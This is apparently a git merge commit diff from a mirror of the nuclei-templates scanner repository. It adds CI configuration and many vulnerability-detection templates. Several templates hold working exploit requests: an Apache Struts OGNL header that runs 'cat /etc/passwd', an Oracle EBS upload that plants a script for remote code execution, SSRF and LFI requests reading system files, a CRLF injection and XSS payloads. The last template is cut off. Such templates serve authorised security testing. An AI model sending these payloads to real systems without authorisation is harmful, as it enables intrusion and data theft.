daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into dashboard

patch-1
sullo 2023-01-23 15:20:38 -05:00 committed by GitHub
parent 846bb7b391 1815650540
commit ea6cbbf438
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
94 changed files with 3210 additions and 150 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
.github/auto_assign.yml vendored Normal file
View File

@ -0,0 +1,30 @@
# Set to true to add reviewers to pull requests
addReviewers: true
# Set to true to add assignees to pull requests
addAssignees: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- ritikchaddha
- DhiyaneshGeek
- pussycat0x
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 1
# A list of assignees, overrides reviewers if set
assignees:
- DhiyaneshGeek
- pussycat0x
- ritikchaddha
# A number of assignees to add to the pull request
# Set to 0 to add all of the assignees.
# Uses numberOfReviewers if unset.
numberOfAssignees: 1
# A list of keywords to be skipped the process that add reviewers if pull requests include it
# skipKeywords:
# - wip

92
.github/scripts/yaml2json.go vendored Normal file
View File

@ -0,0 +1,92 @@
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
"gopkg.in/yaml.v3"
)
type Classification struct {
CVSSScore string `yaml:"cvss-score,omitempty"`
}
type Info struct {
Name string `yaml:"name"`
Severity string `yaml:"severity"`
Description string `yaml:"description"`
Classification Classification `yaml:"classification,omitempty"`
}
type Data struct {
ID string `yaml:"id"`
Info Info `yaml:"info"`
FilePath string `json:"file_path"`
}
func main() {
if len(os.Args) != 3 {
fmt.Println("Usage: go run main.go <directory> <output_file>")
os.Exit(1)
}
directory := os.Args[1]
outputFile := os.Args[2]
var data []Data
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
yamlFile, err := ioutil.ReadFile(path)
if err != nil {
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
return err
}
var d Data
err = yaml.Unmarshal(yamlFile, &d)
if err != nil {
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
return err
}
if d.Info.Classification.CVSSScore == "" {
d.Info.Classification.CVSSScore = "N/A"
}
if d.Info.Classification == (Classification{}) {
d.Info.Classification.CVSSScore = "N/A"
}
d.FilePath = path
data = append(data, d)
}
return nil
})
if err != nil {
fmt.Printf("Error reading directory: %v\n", err)
os.Exit(1)
}
var jsonData []byte
for _, d := range data {
temp, err := json.Marshal(d)
if err != nil {
fmt.Printf("Error marshalling JSON: %v\n", err)
os.Exit(1)
}
jsonData = append(jsonData, temp...)
jsonData = append(jsonData, byte('\n'))
}
err = ioutil.WriteFile(outputFile, jsonData, 0644)
if err != nil {
fmt.Printf("Error writing JSON data to file: %v\n", err)
os.Exit(1)
}
fmt.Println("JSON data written to", outputFile)
}

38
.github/workflows/cve2json.yml vendored Normal file
View File

@ -0,0 +1,38 @@
name: Generate JSON Metadata of CVE Templates
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Set up Go
uses: actions/setup-go@v3
with:
go-version: 1.19
check-latest: true
- name: run yaml2json.go to generate cves.json
run: |
go env -w GO111MODULE=off
go get gopkg.in/yaml.v3
go run .github/scripts/yaml2json.go /home/runner/work/nuclei-templates/nuclei-templates/cves/ cves.json
- name: Commit files
run: |
git pull
git add cves.json
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

2
.github/workflows/templates-stats.yml vendored
View File

@ -18,8 +18,6 @@ jobs:
uses: actions/setup-go@v3
with:
go-version: 1.19
check-latest: true
cache: true
- name: Installing Template Stats
run: |

49
.new-additions
View File

@ -1,37 +1,12 @@
cves/2018/CVE-2018-11227.yaml
cves/2018/CVE-2018-11473.yaml
cves/2022/CVE-2022-0234.yaml
cves/2022/CVE-2022-29153.yaml
cves/2022/CVE-2022-44877.yaml
default-logins/empire/empirec2-default-login.yaml
exposed-panels/episerver-panel.yaml
exposed-panels/freepbx-administration-panel.yaml
exposed-panels/ldap-account-manager-panel.yaml
exposed-panels/modoboa-panel.yaml
exposed-panels/monstra-admin-panel.yaml
exposed-panels/saltgui-panel.yaml
exposed-panels/storybook-panel.yaml
exposures/configs/ovpn-config-exposed.yaml
exposures/mobiproxy-dashboard.yaml
file/keys/stackhawk-api-key.yaml
misconfiguration/aem/aem-childrenlist-xss.yaml
misconfiguration/installer/impresspages-installer.yaml
misconfiguration/installer/monstra-installer.yaml
misconfiguration/installer/orangehrm-installer.yaml
misconfiguration/installer/pmm-installer.yaml
misconfiguration/ntopng-traffic-dashboard.yaml
misconfiguration/phpcli-stack-trace.yaml
misconfiguration/springboot/spring-eureka.yaml
misconfiguration/webdav-enabled.yaml
technologies/citrix-hypervisor-page.yaml
technologies/dash-panel-detect.yaml
technologies/default-cakephp-page.yaml
technologies/default-runcloud-page.yaml
technologies/default-symfony-page.yaml
technologies/default-tengine-page.yaml
technologies/monstracms-detect.yaml
technologies/ntop-detect.yaml
technologies/wordpress/plugins/otter-blocks.yaml
technologies/wordpress/plugins/webp-express.yaml
token-spray/api-ipdata.yaml
token-spray/api-ipinfo.yaml
cves/2022/CVE-2022-1168.yaml
cves/2022/CVE-2022-39195.yaml
exposed-panels/connect-box-login.yaml
exposed-panels/esphome-panel.yaml
exposed-panels/sqlbuddy-panel.yaml
file/android/deep-link-detect.yaml
misconfiguration/esphome-dashboard.yaml
vulnerabilities/other/academy-lms-xss.yaml
vulnerabilities/other/slims-xss.yaml
vulnerabilities/other/sound4-file-disclosure.yaml
vulnerabilities/other/tikiwiki-xss.yaml
"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"

2
README.md
View File

@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
**336 directories, 5244 files**.
**337 directories, 5307 files**.
</td>
</tr>

1552
cves.json Normal file
View File

File diff suppressed because it is too large Load Diff

37
cves/2010/CVE-2010-1429.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2010-1429
info:
name: JBossEAP - Sensitive Information Disclosure
author: R12W4N
severity: low
description: |
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1429
- https://nvd.nist.gov/vuln/detail/CVE-2008-3273
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
- http://securitytracker.com/id?1023918
classification:
cve-id: CVE-2010-1429
metadata:
shodan-query: title:"JBoss"
verified: "true"
tags: cve,cve2010,jboss,eap,tomcat,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/status?full=true"
matchers-condition: and
matchers:
- type: word
words:
- "JVM"
- "memory"
- "localhost/"
condition: and
- type: status
status:
- 200

45
cves/2017/CVE-2017-11165.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2017-11165
info:
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
author: theabhinavgaur
severity: critical
description: |
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
reference:
- https://www.exploit-db.com/exploits/45094
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
- https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
- https://www.exploit-db.com/exploits/42313/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-11165
cwe-id: CWE-200
metadata:
shodan-query: http.title:"datataker"
verified: "true"
tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
matchers-condition: and
matchers:
- type: word
words:
- "COMMAND_SERVER"
- "<loggerSettings>"
- "config id=\"config"
condition: and
- type: word
part: header
words:
- "text/xml"
- type: status
status:
- 200

26
cves/2017/CVE-2017-5638.yaml
View File

@ -4,32 +4,36 @@ info:
name: Apache Struts 2 - Remote Command Execution
author: Random_Robbie
severity: critical
description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
description: |
Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
reference:
- https://github.com/mazen160/struts-pwn
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
tags: apache,kev,msf,cve,cve2017,struts,rce
metadata:
shodan-query: html:"Apache Struts"
verified: "true"
tags: cve,cve2017,apache,kev,msf,struts,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}
matchers-condition: and
matchers:
- type: word
words:
- "X-Hacker: Bounty Plz"
part: header
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/04/26
- type: status
status:
- 200

2
cves/2017/CVE-2017-7615.yaml
View File

@ -18,7 +18,7 @@ info:
- http://www.openwall.com/lists/oss-security/2017/04/16/2
- https://nvd.nist.gov/vuln/detail/CVE-2017-7615
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-7615
cwe-id: CWE-640

37
cves/2018/CVE-2018-16979.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2018-16979
info:
name: Monstra CMS V3.0.4 - HTTP Header Injection
author: 0x_Akoko
severity: medium
description: |
Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.
reference:
- https://github.com/howchen/howchen/issues/4
- https://nvd.nist.gov/vuln/detail/CVE-2018-16979
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16979
cwe-id: CWE-113
metadata:
verified: "true"
tags: cve,cve2018,crlf,mostra,mostracms,cms
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'new line detected in'
- 'cryptographp.php'
condition: and
- type: status
status:
- 200

2
cves/2018/CVE-2018-17431.yaml
View File

@ -11,7 +11,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2018-17431
- https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287

6
cves/2018/CVE-2018-19365.yaml
View File

@ -3,15 +3,15 @@ id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
author: 0x_Akoko
severity: high
severity: critical
description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi

13
cves/2019/CVE-2019-15501.yaml
View File

@ -2,9 +2,10 @@ id: CVE-2019-15501
info:
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
author: LogicalHunter
author: LogicalHunter,arafatansari
severity: medium
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
description: |
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
reference:
- https://www.exploit-db.com/exploits/47302
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
@ -14,6 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-15501
cwe-id: CWE-79
metadata:
shodan-query: http.html:"LISTSERV"
verified: "true"
tags: cve,cve2019,xss,listserv,edb
requests:
@ -24,9 +28,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
part: body
- 'LISTSERV'
condition: and
case-insensitive: true
- type: word
part: header

65
cves/2020/CVE-2020-23697.yaml Normal file
View File

@ -0,0 +1,65 @@
id: CVE-2020-23697
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
reference:
- https://github.com/monstra-cms/monstra/issues/463
- https://nvd.nist.gov/vuln/detail/CVE-2020-23697
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-23697
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
variables:
string: "{{to_lower('{{randstr}}')}}"
requests:
- raw:
- |
POST /admin/index.php?id=dashboard HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login={{username}}&password={{password}}&login_submit=Log+In
- |
GET /admin/index.php?id=pages&action=add_page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /admin/index.php?id=pages&action=add_page HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
- |
GET /{{string}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_4, "text/html")'
- 'status_code_4 == 200'
- 'contains(body_4, "><script>alert(document.domain)</script>") && contains(body_4, "Monstra")'
condition: and
extractors:
- type: regex
name: csrf
part: body
group: 1
regex:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true

2
cves/2021/CVE-2021-42258.yaml
View File

@ -29,7 +29,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â{{VSÂ}}")}}&__VIEWSTATEGENERATOR={{url_encode("Â{{VSGÂ}}")}}&__EVENTVALIDATION={{url_encode("Â{{EVÂ}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:

44
cves/2022/CVE-2022-1168.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-1168
info:
name: JobSearch < 1.5.1 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.
reference:
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1168
cwe-id: CWE-79
metadata:
google-dork: inurl:"wp-content/plugins/wp-jobsearch"
verified: "true"
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(domain)>"
- "wp-jobsearch"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 404

76
cves/2022/CVE-2022-21587.yaml Normal file
View File

@ -0,0 +1,76 @@
id: CVE-2022-21587
info:
name: Oracle EBS Unauthenticated - Remote Code Execution
author: rootxharsh,iamnoooob
severity: critical
description: |
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
- https://www.oracle.com/security-alerts/cpuoct2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
requests:
- raw:
- |
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"
TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
- |
GET /OA_CGI/FNDWRR.exe HTTP/1.1
Host: {{Hostname}}
- |
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"
TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
(``!B````````
`
end
matchers:
- type: word
part: body_2
words:
- Nuclei-CVE-2022-21587

79
cves/2022/CVE-2022-28117.yaml Normal file
View File

@ -0,0 +1,79 @@
id: CVE-2022-28117
info:
name: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF)
author: theabhinavgaur
severity: medium
description: |
A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter.
reference:
- https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html
- https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5
- https://nvd.nist.gov/vuln/detail/CVE-2022-28117
- https://www.youtube.com/watch?v=4kHW95CMfD0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
cvss-score: 4.9
cve-id: CVE-2022-28117
cwe-id: CWE-918
metadata:
verified: "true"
tags: authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi
requests:
- raw:
- |
GET /navigate/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /navigate/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="login-username"
{{username}}
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="csrf_token"
{{csrf_token}}
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="login-password"
{{password}}
-----------------------------123456789012345678901234567890
- |
POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
limit=5&language=en&url=file:///etc/passwd
- |
GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- 'csrf_token" value="([a-f0-9]{64})'
internal: true

65
cves/2022/CVE-2022-36537.yaml Normal file
View File

@ -0,0 +1,65 @@
id: CVE-2022-36537
info:
name: ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 - Sensitive Information Disclosure
author: theamanrawat
severity: high
description: |
ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader.
reference:
- https://github.com/Malwareman007/CVE-2022-36537/
- https://nvd.nist.gov/vuln/detail/CVE-2022-36537
- https://tracker.zkoss.org/browse/ZK-5150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-36537
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Server backup manager"
verified: "true"
tags: cve,cve2022,zk-framework,exposure,unauth
requests:
- raw:
- |
GET /login.zul HTTP/1.1
Host: {{Hostname}}
- |
POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Length: 154
------WebKitFormBoundaryCs6yB0zvpfSBbYEp
Content-Disposition: form-data; name="nextURI"
/WEB-INF/web.xml
------WebKitFormBoundaryCs6yB0zvpfSBbYEp--
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<display-name>.*</display-name>"
- "<welcome-file-list>((.|\n)*)welcome-file-list>"
- "xml version"
- "web-app"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: dtid
group: 1
regex:
- "dt:'(.*?)',cu:"
internal: true

44
cves/2022/CVE-2022-39195.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-39195
info:
name: LISTSERV v17 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.
reference:
- https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39195
- https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
- https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
classification:
cve-id: CVE-2022-39195
metadata:
shodan-query: http.html:"LISTSERV"
verified: "true"
tags: cve,cve2022,xss,listserv,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
- "LISTSERV"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
cves/2022/CVE-2022-44877.yaml
View File

@ -19,7 +19,7 @@ info:
metadata:
shodan-query: http.title:"Login | Control WebPanel"
verified: "true"
tags: cve,cve2022,centos,rce
tags: cve,cve2022,centos,rce,kev
requests:
- raw:

44
cves/2022/CVE-2022-47945.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-47945
info:
name: Thinkphp Lang - Local File Inclusion
author: kagamigawa
severity: critical
description: |
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
reference:
- https://tttang.com/archive/1865/
- https://nvd.nist.gov/vuln/detail/CVE-2022-47945
- https://github.com/top-think/framework/compare/v6.0.13...v6.0.14
- https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47945
metadata:
fofa-query: header="think_lang"
shodan-query: title:"Thinkphp"
verified: "true"
tags: cve,cve2022,thinkphp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500
# Enhanced by mp on 2023/01/15

48
cves/2022/CVE-2022-47966.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2022-47966
info:
name: ManageEngine - Remote Command Execution
author: rootxharsh,iamnoooob,DhiyaneshDK
severity: critical
description: |
Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.
reference:
- https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q
